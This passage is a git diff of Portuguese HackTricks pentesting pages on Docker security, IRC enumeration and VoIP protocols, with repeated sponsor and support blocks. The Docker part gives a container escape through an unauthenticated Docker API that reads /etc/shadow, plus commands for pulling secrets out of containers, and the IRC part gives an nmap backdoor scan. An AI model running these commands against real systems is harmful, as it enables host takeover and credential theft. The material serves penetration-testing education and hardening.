Abusando disso, é possível escapar de um contêiner, você poderia executar um contêiner fraco na máquina remota, escapar dele e comprometer a máquina:
Abusando disso, é possível escapar de um container, você poderia executar um container fraco na máquina remota, escapar dele e comprometer a máquina:
```bash
docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine
cat /mnt/etc/shadow
```
* [https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/CVE%20Exploits/Docker%20API%20RCE.py)
## Escalação de Privilégios
### Escalação de Privilégios
Se você estiver dentro de um host que está usando o Docker, você pode [**ler estas informações para tentar elevar os privilégios**](../linux-hardening/privilege-escalation/#writable-docker-socket).
## Descobrindo segredos em contêineres Docker em execução
### Descobrindo segredos em contêineres Docker em execução
```bash
docker ps [| grep <kubernetes_service_name>]
docker inspect <docker_id>
```
Verifique a seção de **env** (variáveis de ambiente) em busca de segredos e você pode encontrar:
Verifique a seção de variáveis de ambiente para segredos e você pode encontrar:
* Senhas.
* IPs.
@ -227,13 +241,13 @@ Verifique a seção de **env** (variáveis de ambiente) em busca de segredos e v
* Caminhos.
* Outros... .
Se deseja extrair um arquivo:
Se você deseja extrair um arquivo:
```bash
docker cp <docket_id>:/etc/<secret_01> <secret_01>
```
## Protegendo seu Docker
### Protegendo seu Docker
### Protegendo a instalação e uso do Docker
#### Protegendo a instalação e uso do Docker
* Você pode usar a ferramenta [https://github.com/docker/docker-bench-security](https://github.com/docker/docker-bench-security) para inspecionar sua instalação atual do Docker.
* `./docker-bench-security.sh`
@ -244,35 +258,35 @@ docker cp <docket_id>:/etc/<secret_01> <secret_01>
* `docker run --rm -it --pid host r.j3ss.co/amicontained`
* `docker run --rm -it --security-opt "apparmor=unconfined" r.j3ss.co/amicontained`
### Protegendo Imagens do Docker
#### Protegendo Imagens do Docker
* Você pode usar uma imagem do Docker de [https://github.com/quay/clair](https://github.com/quay/clair) para escanear suas outras imagens do Docker e encontrar vulnerabilidades.
* `docker run --rm -v /root/clair_config/:/config -p 6060-6061:6060-6061 -d clair -config="/config/config.yaml"`
* `clair-scanner -c http://172.17.0.3:6060 --ip 172.17.0.1 ubuntu-image`
### Protegendo Dockerfiles
#### Protegendo Dockerfiles
* Você pode usar a ferramenta [https://github.com/buddy-works/dockerfile-linter](https://github.com/buddy-works/dockerfile-linter) para **inspecionar seu Dockerfile** e encontrar todos os tipos de configurações incorretas. Cada configuração incorreta receberá um ID, você pode encontrar aqui [https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md](https://github.com/buddy-works/dockerfile-linter/blob/master/Rules.md) como corrigir cada uma delas.
* `dockerfilelinter -f Dockerfile`
![](<../.gitbook/assets/image (418).png>)
![](<../.gitbook/assets/image (173).png>)
* Você pode usar a ferramenta [https://github.com/replicatedhq/dockerfilelint](https://github.com/replicatedhq/dockerfilelint) para **inspecionar seu Dockerfile** e encontrar todos os tipos de configurações incorretas.
* `dockerfilelint Dockerfile`
![](<../.gitbook/assets/image (419).png>)
![](<../.gitbook/assets/image (209).png>)
* Você pode usar a ferramenta [https://github.com/RedCoolBeans/dockerlint](https://github.com/RedCoolBeans/dockerlint) para **inspecionar seu Dockerfile** e encontrar todos os tipos de configurações incorretas.
* `dockerlint Dockerfile`
![](<../.gitbook/assets/image (420).png>)
![](<../.gitbook/assets/image (68).png>)
* Você pode usar a ferramenta [https://github.com/hadolint/hadolint](https://github.com/hadolint/hadolint) para **inspecionar seu Dockerfile** e encontrar todos os tipos de configurações incorretas.
* `hadolint Dockerfile`
![](<../.gitbook/assets/image (421).png>)
![](<../.gitbook/assets/image (498).png>)
### Registrando atividades suspeitas
#### Registrando atividades suspeitas
* Você pode usar a ferramenta [https://github.com/falcosecurity/falco](https://github.com/falcosecurity/falco) para detectar **comportamentos suspeitos em contêineres em execução**.
* Observe no trecho a seguir como **Falco compila um módulo de kernel e o insere**. Depois disso, ele carrega as regras e **começa a registrar atividades suspeitas**. Neste caso, ele detectou 2 contêineres privilegiados iniciados, sendo que um deles possui um ponto de montagem sensível, e após alguns segundos detectou a abertura de um shell dentro de um dos contêineres.
@ -316,24 +330,39 @@ falco-probe found and loaded in dkms
2021-01-04T12:03:24.664354000+0000: Notice Privileged container started (user=root command=container:4443a8daceb8 focused_brahmagupta (id=4443a8daceb8) image=falco:latest)
2021-01-04T12:04:56.270553320+0000: Notice A shell was spawned in a container with an attached terminal (user=root xenodochial_kepler (id=4822e8378c00) shell=bash parent=runc cmdline=bash terminal=34816 container_id=4822e8378c00 image=ubuntu)
```
### Monitoramento do Docker
#### Monitoramento do Docker
Você pode usar o auditd para monitorar o docker.
Você pode usar o auditd para monitorar o Docker.
### Referências
## Referências
* [https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html](https://ti8m.com/blog/Why-Podman-is-worth-a-look-.html)
* [https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc](https://stackoverflow.com/questions/41645665/how-containerd-compares-to-runc)
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater invasões de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks\_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

39
network-services-pentesting/pentesting-irc.md
View file

@ -4,7 +4,7 @@
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
Outras formas de apoiar o HackTricks:
* Se você quiser ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
@ -14,9 +14,23 @@ Outras maneiras de apoiar o HackTricks:
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Informações Básicas
IRC, inicialmente um **protocolo de texto simples**, foi atribuído **194/TCP** pela IANA, mas é comumente executado em **6667/TCP** e portas semelhantes para evitar a necessidade de **privilégios de root** para operação.
IRC, inicialmente um protocolo de **texto simples**, foi atribuído **194/TCP** pela IANA, mas é comumente executado em **6667/TCP** e portas semelhantes para evitar a necessidade de **privilégios de root** para operação.
Um **apelido** é tudo o que é necessário para se conectar a um servidor. Após a conexão, o servidor realiza uma pesquisa de DNS reverso no IP do usuário.
@ -77,22 +91,35 @@ USER test1 test2 <IP> :test3
```bash
nmap -sV --script irc-botnet-channels,irc-info,irc-unrealircd-backdoor -p 194,6660-7000 <ip>
```
### [Força Bruta](../generic-methodologies-and-resources/brute-force.md#irc)
### [Ataque de Força Bruta](../generic-methodologies-and-resources/brute-force.md#irc)
### Shodan
* `pesquisando seu nome de host`
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares ladrões**.
O principal objetivo do WhiteIntel é combater tomadas de conta e ataques de ransomware resultantes de malwares que roubam informações.
Você pode acessar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>Aprenda hacking AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras maneiras de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, verifique os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**oficial PEASS & HackTricks swag**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe seus truques de hacking enviando PRs para os repositórios do** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud).
</details>

74
network-services-pentesting/pentesting-voip/basic-voip-protocols/README.md
View file

@ -2,18 +2,32 @@
<details>
<summary><strong>Aprenda hacking da AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (Especialista em Equipe Vermelha AWS do HackTricks)</strong></a><strong>!</strong></summary>
<summary><strong>Aprenda hacking na AWS do zero ao herói com</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
Outras formas de apoiar o HackTricks:
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF**, confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Se você deseja ver sua **empresa anunciada no HackTricks** ou **baixar o HackTricks em PDF** Confira os [**PLANOS DE ASSINATURA**](https://github.com/sponsors/carlospolop)!
* Adquira o [**swag oficial PEASS & HackTricks**](https://peass.creator-spring.com)
* Descubra [**A Família PEASS**](https://opensea.io/collection/the-peass-family), nossa coleção exclusiva de [**NFTs**](https://opensea.io/collection/the-peass-family)
* **Junte-se ao** 💬 [**grupo Discord**](https://discord.gg/hRep4RUj7f) ou ao [**grupo telegram**](https://t.me/peass) ou **siga-nos** no **Twitter** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
* **Compartilhe seus truques de hacking enviando PRs para os** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
* **Compartilhe suas dicas de hacking enviando PRs para o** [**HackTricks**](https://github.com/carlospolop/hacktricks) e [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) repositórios do github.
</details>
## WhiteIntel
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io) é um mecanismo de busca alimentado pela **dark web** que oferece funcionalidades **gratuitas** para verificar se uma empresa ou seus clientes foram **comprometidos** por **malwares de roubo**.
O principal objetivo do WhiteIntel é combater tomadas de contas e ataques de ransomware resultantes de malwares de roubo de informações.
Você pode verificar o site deles e experimentar o mecanismo gratuitamente em:
{% embed url="https://whiteintel.io" %}
---
## Protocolos de Sinalização
### SIP (Protocolo de Iniciação de Sessão)
@ -26,40 +40,40 @@ Este é o padrão da indústria, para mais informações consulte:
### MGCP (Protocolo de Controle de Gateway de Mídia)
MGCP (Protocolo de Controle de Gateway de Mídia) é um **protocolo de sinalização** e **controle de chamadas** delineado no RFC 3435. Opera em uma arquitetura centralizada, que consiste em três componentes principais:
MGCP (Protocolo de Controle de Gateway de Mídia) é um **protocolo de sinalização** e **controle de chamadas** delineado no RFC 3435. Ele opera em uma arquitetura centralizada, que consiste em três componentes principais:
1. **Agente de Chamadas ou Controlador de Gateway de Mídia (MGC)**: O gateway mestre na arquitetura MGCP é responsável por **gerenciar e controlar os gateways de mídia**. Ele lida com o processo de configuração, modificação e término de chamadas. O MGC se comunica com os gateways de mídia usando o protocolo MGCP.
2. **Gateways de Mídia (MGs) ou Gateways Escravos**: Esses dispositivos **convertem fluxos de mídia digitais entre diferentes redes**, como telefonia tradicional comutada por circuitos e redes IP comutadas por pacotes. Eles são gerenciados pelo MGC e executam comandos recebidos dele. Os gateways de mídia podem incluir funções como transcoding, packetization e cancelamento de eco.
3. **Gateways de Sinalização (SGs)**: Esses gateways são responsáveis por **converter mensagens de sinalização entre diferentes redes**, permitindo comunicação contínua entre sistemas de telefonia tradicionais (por exemplo, SS7) e redes baseadas em IP (por exemplo, SIP ou H.323). Os gateways de sinalização são cruciais para interoperabilidade e garantem que as informações de controle de chamadas sejam comunicadas adequadamente entre as diferentes redes.
1. **Agente de Chamadas ou Controlador de Gateway de Mídia (MGC)**: O gateway principal na arquitetura MGCP é responsável por **gerenciar e controlar os gateways de mídia**. Ele lida com processos de configuração, modificação e término de chamadas. O MGC se comunica com os gateways de mídia usando o protocolo MGCP.
2. **Gateways de Mídia (MGs) ou Gateways Escravos**: Esses dispositivos **convertem fluxos de mídia digital entre diferentes redes**, como telefonia tradicional comutada por circuitos e redes IP comutadas por pacotes. Eles são gerenciados pelo MGC e executam comandos recebidos dele. Os gateways de mídia podem incluir funções como transcoding, packetization e cancelamento de eco.
3. **Gateways de Sinalização (SGs)**: Esses gateways são responsáveis por **converter mensagens de sinalização entre diferentes redes**, permitindo comunicação contínua entre sistemas de telefonia tradicional (por exemplo, SS7) e redes baseadas em IP (por exemplo, SIP ou H.323). Os gateways de sinalização são cruciais para interoperabilidade e garantir que as informações de controle de chamadas sejam comunicadas adequadamente entre as diferentes redes.
Em resumo, o MGCP centraliza a lógica de controle de chamadas no agente de chamadas, o que simplifica o gerenciamento de gateways de mídia e sinalização, proporcionando melhor escalabilidade, confiabilidade e eficiência em redes de telecomunicações.
### SCCP (Protocolo de Controle de Cliente Magro)
O Protocolo de Controle de Cliente Magro (SCCP) é um **protocolo de sinalização e controle de chamadas proprietário** de propriedade da Cisco Systems. É usado principalmente para comunicação entre o **Cisco Unified Communications Manager** (anteriormente conhecido como CallManager) e telefones IP Cisco ou outros endpoints de voz e vídeo da Cisco.
O Protocolo de Controle de Cliente Magro (SCCP) é um **protocolo de sinalização e controle de chamadas proprietário** de propriedade da Cisco Systems. É **principalmente usado** para comunicação entre o **Cisco Unified Communications Manager** (anteriormente conhecido como CallManager) e telefones IP Cisco ou outros endpoints de voz e vídeo da Cisco.
O SCCP é um protocolo leve que simplifica a comunicação entre o servidor de controle de chamadas e os dispositivos de endpoint. É chamado de "Magro" por causa de seu design minimalista e requisitos de largura de banda reduzidos em comparação com outros protocolos VoIP como H.323 ou SIP.
Os principais componentes de um sistema baseado em SCCP são:
1. **Servidor de Controle de Chamadas**: Este servidor, normalmente um Cisco Unified Communications Manager, gerencia o processo de configuração, modificação e término de chamadas, bem como outras funcionalidades de telefonia, como encaminhamento de chamadas, transferência de chamadas e espera de chamadas.
2. **Endpoints SCCP**: Estes são dispositivos como telefones IP, unidades de videoconferência ou outros endpoints de voz e vídeo da Cisco que usam SCCP para se comunicar com o servidor de controle de chamadas. Eles se registram no servidor, enviam e recebem mensagens de sinalização e seguem as instruções fornecidas pelo servidor de controle de chamadas para o gerenciamento de chamadas.
1. **Servidor de Controle de Chamadas**: Este servidor, normalmente um Cisco Unified Communications Manager, gerencia os processos de configuração, modificação e término de chamadas, bem como outras funcionalidades de telefonia, como encaminhamento de chamadas, transferência de chamadas e espera de chamadas.
2. **Endpoints SCCP**: Estes são dispositivos como telefones IP, unidades de videoconferência ou outros endpoints de voz e vídeo da Cisco que usam SCCP para se comunicar com o servidor de controle de chamadas. Eles se registram no servidor, enviam e recebem mensagens de sinalização e seguem as instruções fornecidas pelo servidor de controle de chamadas para o tratamento de chamadas.
3. **Gateways**: Esses dispositivos, como gateways de voz ou gateways de mídia, são responsáveis por converter fluxos de mídia entre diferentes redes, como telefonia tradicional comutada por circuitos e redes IP comutadas por pacotes. Eles também podem incluir funcionalidades adicionais, como transcoding ou cancelamento de eco.
O SCCP oferece um método de comunicação simples e eficiente entre os servidores de controle de chamadas da Cisco e os dispositivos de endpoint. No entanto, vale ressaltar que **o SCCP é um protocolo proprietário**, o que pode limitar a interoperabilidade com sistemas não-Cisco. Em tais casos, outros protocolos VoIP padrão como SIP podem ser mais adequados.
### H.323
H.323 é um **conjunto de protocolos** para comunicação multimídia, incluindo voz, vídeo e conferências de dados em redes comutadas por pacotes, como redes baseadas em IP. Foi desenvolvido pela **União Internacional de Telecomunicações** (ITU-T) e fornece uma estrutura abrangente para gerenciar sessões de comunicação multimídia.
H.323 é uma **suíte de protocolos** para comunicação multimídia, incluindo voz, vídeo e conferências de dados em redes comutadas por pacotes, como redes baseadas em IP. Foi desenvolvido pela **União Internacional de Telecomunicações** (ITU-T) e fornece uma estrutura abrangente para gerenciar sessões de comunicação multimídia.
Alguns componentes-chave do conjunto H.323 incluem:
Alguns componentes-chave da suíte H.323 incluem:
1. **Terminais**: Estes são dispositivos de endpoint, como telefones IP, sistemas de videoconferência ou aplicativos de software, que suportam H.323 e podem participar de sessões de comunicação multimídia.
2. **Gateways**: Esses dispositivos convertem fluxos de mídia entre diferentes redes, como telefonia tradicional comutada por circuitos e redes IP comutadas por pacotes, permitindo interoperabilidade entre H.323 e outros sistemas de comunicação. Eles também podem incluir funcionalidades adicionais, como transcoding ou cancelamento de eco.
3. **Gatekeepers**: Estes são componentes opcionais que fornecem serviços de controle e gerenciamento de chamadas em uma rede H.323. Eles realizam funções como tradução de endereços, gerenciamento de largura de banda e controle de admissão, ajudando a gerenciar e otimizar os recursos da rede.
4. **Unidades de Controle Multiponto (MCUs)**: Estes dispositivos facilitam conferências multiponto gerenciando e misturando fluxos de mídia de vários endpoints. As MCUs permitem recursos como controle de layout de vídeo, comutação ativada por voz e presença contínua, possibilitando a realização de conferências em grande escala com vários participantes.
O H.323 suporta uma variedade de codecs de áudio e vídeo, bem como outros serviços suplementares como encaminhamento de chamadas, transferência de chamadas, espera de chamadas e chamada em espera. Apesar de sua ampla adoção nos primeiros dias do VoIP, o H.323 foi gradualmente substituído por protocolos mais modernos e flexíveis como o **Protocolo de Iniciação de Sessão (SIP)**, que oferece melhor interoperabilidade e implementação mais fácil. No entanto, o H.323 continua em uso em muitos sistemas legados e continua sendo suportado por vários fornecedores de equipamentos.
O H.323 suporta uma variedade de codecs de áudio e vídeo, bem como outros serviços suplementares como encaminhamento de chamadas, transferência de chamadas, espera de chamadas e espera de chamadas. Apesar de sua ampla adoção nos primeiros dias de VoIP, o H.323 foi gradualmente substituído por protocolos mais modernos e flexíveis como o **Protocolo de Iniciação de Sessão (SIP)**, que oferece melhor interoperabilidade e implementação mais fácil. No entanto, o H.323 continua em uso em muitos sistemas legados e continua sendo suportado por vários fornecedores de equipamentos.
### IAX (Inter Asterisk eXchange)
@ -67,24 +81,23 @@ IAX (Inter-Asterisk eXchange) é um **protocolo de sinalização e controle de c
O IAX é conhecido por sua **simplicidade, eficiência e facilidade de implementação**. Algumas características-chave do IAX incluem:
1. **Porta UDP Única**: O IAX usa uma única porta UDP (4569) para o tráfego de sinalização e mídia, o que simplifica a travessia de firewall e NAT, facilitando a implantação em vários ambientes de rede.
1. **Porta UDP Única**: O IAX usa uma única porta UDP (4569) para tráfego de sinalização e mídia, o que simplifica a travessia de firewall e NAT, facilitando a implantação em vários ambientes de rede.
2. **Protocolo Binário**: Ao contrário de protocolos baseados em texto como SIP, o IAX é um protocolo binário, o que reduz o consumo de largura de banda e o torna mais eficiente para transmitir dados de sinalização e mídia.
3. **Troncos**: O IAX suporta troncos, o que permite combinar várias chamadas em uma única conexão de rede, reduzindo a sobrecarga e melhorando a utilização da largura de banda.
4. **Criptografia Nativa**: O IAX possui suporte integrado para criptografia, usando métodos como RSA para troca de chaves e AES para criptografia de mídia, proporcionando comunicação segura entre os pontos finais.
5. **Comunicação Ponto a Ponto**: O IAX pode ser usado para comunicação direta entre pontos finais sem a necessidade de um servidor central, permitindo roteamento de chamadas mais simples e eficiente.
5. **Comunicação Peer-to-Peer**: O IAX pode ser usado para comunicação direta entre pontos finais sem a necessidade de um servidor central, permitindo roteamento de chamadas mais simples e eficiente.
Apesar de seus benefícios, o IAX tem algumas limitações, como seu foco principal no ecossistema Asterisk e uma adoção menos difundida em comparação com protocolos mais estabelecidos como SIP. Como resultado, o IAX pode não ser a melhor escolha para interoperabilidade com sistemas ou dispositivos não-Asterisk. No entanto, para aqueles que trabalham dentro do ambiente Asterisk, o IAX oferece uma solução robusta e eficiente para comunicação VoIP.
## Protocolos de Transmissão e Transporte
### SDP (Protocolo de Descrição de Sessão)
SDP (Protocolo de Descrição de Sessão) é um **formato baseado em texto** usado para descrever as características de sessões multimídia, como voz, vídeo ou conferências de dados, em redes IP. Foi desenvolvido pelo **Internet Engineering Task Force (IETF)** e é definido no **RFC 4566**. O SDP não lida com a transmissão real de mídia ou estabelecimento de sessão, mas é usado em conjunto com outros protocolos de sinalização, como **SIP (Protocolo de Iniciação de Sessão)**, para negociar e trocar informações sobre os fluxos de mídia e suas atributos.
O SDP (Protocolo de Descrição de Sessão) é um **formato baseado em texto** usado para descrever as características de sessões multimídia, como voz, vídeo ou conferências de dados, em redes IP. Foi desenvolvido pelo **Internet Engineering Task Force (IETF)** e é definido no **RFC 4566**. O SDP não lida com a transmissão real de mídia ou o estabelecimento de sessões, mas é usado em conjunto com outros protocolos de sinalização, como **SIP (Protocolo de Iniciação de Sessão)**, para negociar e trocar informações sobre os fluxos de mídia e suas atributos.
Alguns elementos-chave do SDP incluem:
1. **Informações da Sessão**: O SDP descreve os detalhes de uma sessão multimídia, incluindo nome da sessão, descrição da sessão, hora de início e hora de término.
2. **Fluxos de Mídia**: O SDP define as características dos fluxos de mídia, como o tipo de mídia (áudio, vídeo ou texto), protocolo de transporte (por exemplo, RTP ou SRTP) e o formato de mídia (por exemplo, informações de codec).
1. **Informações da Sessão**: O SDP descreve os detalhes de uma sessão multimídia, incluindo nome da sessão, descrição da sessão, horário de início e término.
2. **Fluxos de Mídia**: O SDP define as características dos fluxos de mídia, como o tipo de mídia (áudio, vídeo ou texto), protocolo de transporte (por exemplo, RTP ou SRTP) e o formato da mídia (por exemplo, informações de codec).
3. **Informações de Conexão**: O SDP fornece informações sobre o endereço de rede (endereço IP) e número da porta onde a mídia deve ser enviada ou recebida.
4. **Atributos**: O SDP suporta o uso de atributos para fornecer informações adicionais e opcionais sobre uma sessão ou fluxo de mídia. Os atributos podem ser usados para especificar várias funcionalidades como chaves de criptografia, requisitos de largura de banda ou mecanismos de controle de mídia.
@ -93,24 +106,27 @@ O SDP é tipicamente usado no seguinte processo:
1. Uma parte iniciadora cria uma descrição SDP da sessão multimídia proposta, incluindo os detalhes dos fluxos de mídia e seus atributos.
2. A descrição SDP é enviada para a parte receptora, geralmente incorporada em uma mensagem de protocolo de sinalização como SIP ou RTSP.
3. A parte receptora processa a descrição SDP e, com base em suas capacidades, pode aceitar, rejeitar ou modificar a sessão proposta.
4. A descrição SDP final é enviada de volta para a parte iniciadora como parte da mensagem de protocolo de sinalização, completando o processo de negociação.
4. A descrição final do SDP é enviada de volta para a parte iniciadora como parte da mensagem de protocolo de sinalização, completando o processo de negociação.
A simplicidade e flexibilidade do SDP o tornam um padrão amplamente adotado para descrever sessões multimídia em vários sistemas de comunicação, desempenhando um papel crucial no estabelecimento e gerenciamento de sessões multimídia em tempo real em redes IP.
### RTP / RTCP / SRTP / ZRTP
1. **RTP (Protocolo de Transporte em Tempo Real)**: RTP é um protocolo de rede projetado para a entrega de dados de áudio e vídeo, ou outras mídias em tempo real, em redes IP. Desenvolvido pelo **IETF** e definido no **RFC 3550**, o RTP é comumente usado com protocolos de sinalização como SIP e H.323 para habilitar a comunicação multimídia. O RTP fornece mecanismos de **sincronização**, **sequenciamento** e **timestamping** de fluxos de mídia, ajudando a garantir a reprodução suave e oportuna da mídia.
2. **RTCP (Protocolo de Controle de Transporte em Tempo Real)**: O RTCP é um protocolo complementar ao RTP, usado para monitorar a qualidade de serviço (QoS) e fornecer feedback sobre a transmissão de fluxos de mídia. Definido no mesmo **RFC 3550** que o RTP, o RTCP **troca periodicamente pacotes de controle entre os participantes em uma sessão RTP**. Ele compartilha informações como perda de pacotes, jitter e tempo de ida e volta, o que ajuda a diagnosticar e se adaptar às condições da rede, melhorando a qualidade geral da mídia.
1. **RTP (Protocolo de Transporte em Tempo Real)**: O RTP é um protocolo de rede projetado para a entrega de dados de áudio e vídeo, ou outras mídias em tempo real, em redes IP. Desenvolvido pelo **IETF** e definido no **RFC 3550**, o RTP é comumente usado com protocolos de sinalização como SIP e H.323 para permitir a comunicação multimídia. O RTP fornece mecanismos de **sincronização**, **sequenciamento** e **timestamping** de fluxos de mídia, ajudando a garantir a reprodução suave e oportuna da mídia.
2. **RTCP (Protocolo de Controle de Transporte em Tempo Real)**: O RTCP é um protocolo complementar ao RTP, usado para monitorar a qualidade de serviço (QoS) e fornecer feedback sobre a transmissão de fluxos de mídia. Definido no mesmo **RFC 3550** que o RTP, o RTCP **troca periodicamente pacotes de controle entre os participantes em uma sessão RTP**. Ele compartilha informações como perda de pacotes, jitter e tempo de ida e volta, o que ajuda a diagnosticar e se adaptar às condições de rede, melhorando a qualidade geral da mídia.
3. **SRTP (Protocolo de Transporte Seguro em Tempo Real)**: O SRTP é uma extensão do RTP que fornece **criptografia**, **autenticação de mensagem** e **proteção contra repetição** para fluxos de mídia, garantindo a transmissão segura de dados de áudio e vídeo sensíveis. Definido no **RFC 3711**, o SRTP usa algoritmos criptográficos como AES para criptografia e HMAC-SHA1 para autenticação de mensagem. O SRTP é frequentemente usado em combinação com protocolos de sinalização seguros como SIP sobre TLS para fornecer segurança de ponta a ponta na comunicação multimídia.
4. **ZRTP (Protocolo de Transporte em Tempo Real de Zimmermann)**: O ZRTP é um protocolo de acordo de chaves criptográficas que fornece **criptografia de ponta a ponta** para fluxos de mídia RTP. Desenvolvido por Phil Zimmermann, o criador do PGP, o ZRTP é descrito no **RFC 6189**. Ao contrário do SRTP, que depende de protocolos de sinalização para troca de chaves, o ZRTP é projetado para funcionar independentemente do protocolo de sinalização. Ele usa **troca de chaves Diffie-Hellman** para estabelecer um segredo compartilhado entre as partes comunicantes, sem exigir confiança prévia ou uma infraestrutura de chave pública (PKI). O ZRTP também inclui recursos como **Strings de Autenticação Curtas (SAS)** para proteção contra ataques de intermediários.
4. **ZRTP (Protocolo de Transporte em Tempo Real de Zimmermann)**: O ZRTP é um protocolo de acordo de chaves criptográficas que fornece **criptografia de ponta a ponta** para fluxos de mídia RTP. Desenvolvido por Phil Zimmermann, o criador do PGP, o ZRTP é descrito no **RFC 6189**. Ao contrário do SRTP, que depende de protocolos de sinalização para troca de chaves, o ZRTP é projetado para funcionar independentemente do protocolo de sinalização. Ele usa a **troca de chaves Diffie-Hellman** para estabelecer um segredo compartilhado entre as partes comunicantes, sem exigir confiança prévia ou uma infraestrutura de chave pública (PKI). O ZRTP também inclui recursos como **Strings de Autenticação Curtas (SAS)** para proteger contra ataques de intermediários.
Esses protocolos desempenham papéis essenciais na **entrega e segurança da comunicação multimídia em tempo real em redes IP**. Enquanto o RTP e o RTCP lidam com a transmissão real de mídia e monitoramento de qualidade, o SRTP e o ZRTP garantem que a mídia transmitida esteja protegida contra escuta, manipulação e ataques de repetição.
Esses protocolos desempenham papéis essenciais na **entrega e segurança da comunicação multimídia em tempo real em redes IP**. Enquanto o RTP e o RTCP lidam com a transmissão real de mídia e monitoramento de qualidade, o SRTP e o ZRTP garantem que a mídia transmitida esteja protegida contra espionagem, manipulação e ataques de repetição.
<details>
## WhiteIntel
